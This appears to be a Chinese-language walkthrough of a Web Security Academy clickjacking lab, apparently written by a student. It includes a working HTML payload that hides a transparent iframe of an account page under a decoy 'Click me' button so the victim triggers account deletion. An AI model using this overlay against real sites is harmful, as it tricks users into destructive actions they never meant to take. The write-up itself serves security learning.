# Clickjacking Lab1 這題目標是讓受害者（使用 Chrome）以為自己在點「Click me」，實際點擊的是 刪除帳號 按鈕，進而觸發刪帳動作。 一樣先進入網站。  登入題目給的帳密後，可以看到有上傳/刪除 email 選項，但為了讓使用者可以點刪除 email ，我們要在上面覆蓋一個區塊，所以要寫個 HTML。  只要寫一個假的按鈕後，上面再疊一個透明的惡意按鈕，這樣使用者只會看到下層的按鈕，但觸發的效果是上層惡意按鈕的行為。 ```html= <style> iframe { position:relative; width:700px; height:500px; opacity: 0.0001; z-index: 2; } div { position:absolute; top:300px; left:60px; z-index: 3; background: white; font-size: 24px; cursor: pointer; } </style> <div>Click me</div> <iframe src="https://YOUR-LAB-ID.web-security-academy.net/my-account"></iframe> ``` 然後調數字調到 Click me 的文字在 Delete email 上面這題就結束了（這邊照片的畫面跑掉，所以沒截到）。  ### Clickjacking Lab2 -> [write up](https://hackmd.io/@mio0813/ryZE-JC4xl) ---